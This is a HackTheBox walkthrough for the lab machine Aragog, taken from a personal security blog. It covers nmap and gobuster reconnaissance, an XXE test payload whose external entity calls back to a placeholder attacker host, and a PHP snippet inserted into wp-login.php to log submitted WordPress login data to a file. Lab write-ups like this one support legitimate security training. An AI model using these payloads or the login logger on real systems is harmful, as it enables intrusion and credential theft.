Kiril's Security Blog

| Ethical Hacker | System Administrator | Penetration Tester | Bug Hunter |

Nothing Is Private ...

© 2020. All rights reserved.

Powered by Hugo & Strange Case (inspired by Hyde).

HackTheBox - Aragog Walkthrough

# Jul 26, 2018

Aragog

1. Recon and Information gathering

Machine name: Aragog
IP: 10.10.10.78
OS: Linux

Nmap

nmap -A 10.10.10.78 -oN base.nmap

Nmap scan report for 10.10.10.78
Host is up (0.13s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-r--r--r--    1 ftp      ftp            86 Dec 21  2017 test.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.14.8
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 5
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ad:21:fb:50:16:d4:93:dc:b7:29:1f:4c:c2:61:16:48 (RSA)
|   256 2c:94:00:3c:57:2f:c2:49:77:24:aa:22:6a:43:7d:b1 (ECDSA)
|_  256 9a:ff:8b:e4:0e:98:70:52:29:68:0e:cc:a0:7d:5c:1f (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jul  5 14:34:23 2018 -- 1 IP address (1 host up) scanned in 12.46 seconds

SSH

SSH is running on default port with no additional interesting information from the scan. On connecting we can see that it only takes ssh key authentication and doesn’t accept passwords:

ssh root@10.10.10.78
root@10.10.10.78: Permission denied (publickey).

FTP

Quick check on the version doesn’t show any vulns available, but we have a file and anonymous access to that file:

<details>
    <subnet_mask>255.255.255.192</subnet_mask>
    <test></test>
</details>

So far that’s all we have/can do with the ftp so we continue with the exposed services.

HTTP

Fist let’s see what is available at / on the webserver:

curl 10.10.10.78 -s | grep title
<title>Apache2 Ubuntu Default Page: It works</title>

Nothing interesting, just the default webpage for Ubuntu’s Apache installations. Next step - dirbusting. We’ll start with a small list and some basic extensions - if we don’t find anything interesting we can expand the search with bigger wordlist:

gobuster -w /usr/share/wordlists/dirb/common.txt -u http://10.10.10.78 -t 50 -x txt,php,xml

Gobuster v1.4.1              OJ Reeves (@TheColonial)
=====================================================
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.78/
[+] Threads      : 50
[+] Wordlist     : /usr/share/wordlists/dirb/common.txt
[+] Status codes : 200,204,301,302,307
[+] Extensions   : .txt,.php,.xml
=====================================================
/hosts.php (Status: 200)
/index.html (Status: 200)
---------------------------------------

Only one php file found with that list. The content:

curl http://10.10.10.78/hosts.php

There are 4294967294 possible hosts for

Looking at the output and seeing 4294967294 and possible hosts should lead our train of thought to ip4 addresses (at least did that for me):

IPv4 uses 32-bit IP address, and with 32 bits the maximum number of IP addresses is 232—or 4,294,967,296.

Adding one IP for broadcast and one for network results in the same number of hosts. Checking back our test.txt and seeing a network mask there should be our next pointer - let’s use them together:

curl -X POST http://10.10.10.78/hosts.php -d @text.txt

Which calculates the possible hosts for the provided netmask:

curl output

So we now know how to interact with the application. Since we have XML input our first check should be for possible XXE (XML External Entity)

2. Vulnerability Testing

As a start let’s run a python webserver on our attacking machine:

python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

And let’s create a file with our payload for testing the app - we’ll call it xxe_test.xml:

<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://OUR.ATTACK.MACHINE.IP" >]>
<details>
    <subnet_mask>&xxe;</subnet_mask>
    <test></test>
</details>

Send it to the webapp via curl request:

curl http://10.10.10.78/hosts.php -X POST -d @xxe_test.txt

check our python server and see if we have a callback:

There are 4294967294 possible hosts for 

10.10.10.78 - - [29/Jul/2018 03:07:19] "GET / HTTP/1.0" 200 -

Bingo! We have a way of executing things on the remove machine. Let’s see what exactly is available to us.

  • XXE testing
  • XXE fixes/avoidance

3. Exploitation

  • XXE exploitation
  • Gaining user access

4. Privilege Escalation

  • Internal enumeration
  • Wordpress
  • Permissions
  • Getting admin credentials through logging Wordpress login form
  • r00tz

Edit wp-login.php:

vim /home/myserverlab/public_html/logger/wp-login.php

Output:

<?php
$entityBody = file_get_contents('php://input');
file_put_contents('admin.logger', $entityBody . "\n");